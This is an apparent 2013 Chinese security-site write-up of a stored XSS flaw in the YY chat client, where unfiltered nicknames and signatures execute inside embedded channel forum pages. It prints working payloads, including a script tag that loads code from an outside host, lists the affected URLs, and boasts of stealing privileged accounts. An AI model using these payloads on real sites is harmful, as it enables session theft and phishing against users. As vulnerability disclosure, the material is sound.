频道栏目
首页 > 安全 > 网站安全 > 正文

YY客户端缺陷导致存储型XSS

2013-08-09 11:06:39            作者:random_
收藏   我要投稿
和qq一样,yy的账户有昵称和签名。

 

qq客户端的和qq的web无缝连接,所以

">'>

这样的代码,在客户端里不会出现bug,但是直接出现在web就可以来xss了。详见:http://tmxk.org/thread-496-1-1.html。

 

yy犯了同样的错误。

 

yy的昵称为20字节不好构造,可行的代码,但已测试,没有过滤,极端情况下可以xss,如

 

<embed/src=//x.cn/x>,这样点击劫持、钓鱼足矣。

 

yy的签名则没有限制,直接上代码

 

<script/src=//tmxk.org/.js></script>

 

 

怎么让此处的代码出现在web里执行呢?

 

 

 

1.我们到频道里测试。

 

首先我断定yy的频道里嵌入了web,这种思路是通用的,很多客户端都是这样,并可以查看web源码。我们ctrl+A复制当前,打开一个在线编辑器,ctrl+C,在编辑器的源码模式就可以看到复制web的源码了。

 

 

通过这种方式我们可以知道签名的代码在web里是什么形态了。

 

2.我们先测试论坛,发帖,发现论坛的编辑器是富文本的,不是textarea,这个就可以插入富文本代码,但是因为嵌入的web,我又不能抓包,我还是通过上面的方式,找到了论坛的web页面,发现,富文本会过滤的。这是论坛url,http://y.duowan.com/channel2/52399485/index

 

 

 

0x1.2我们把签名或昵称改成代码,重复同样操作。发现代码执行了。

这是对应的url,

 

http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEkJNgE-SR4&topicId=wEqk-d1-Pi7

 

http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB

 

这是在yy客户端里的执行情况

 



 

 

我猜想,这个简单的浏览器果断有和脚本交互的接口,我没有耐心去找了。

 

3.这个只要是公会会员就可发帖,该公会的人看到就会中招。

 

盗个紫马不是屌丝梦。

 

结合游戏、音乐等功能,可以横行yy矣。

相关TAG标签 客户端 缺陷
上一篇:新浪的一个Sql注入,可进入后台
下一篇:搜狐登录页面XSS
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站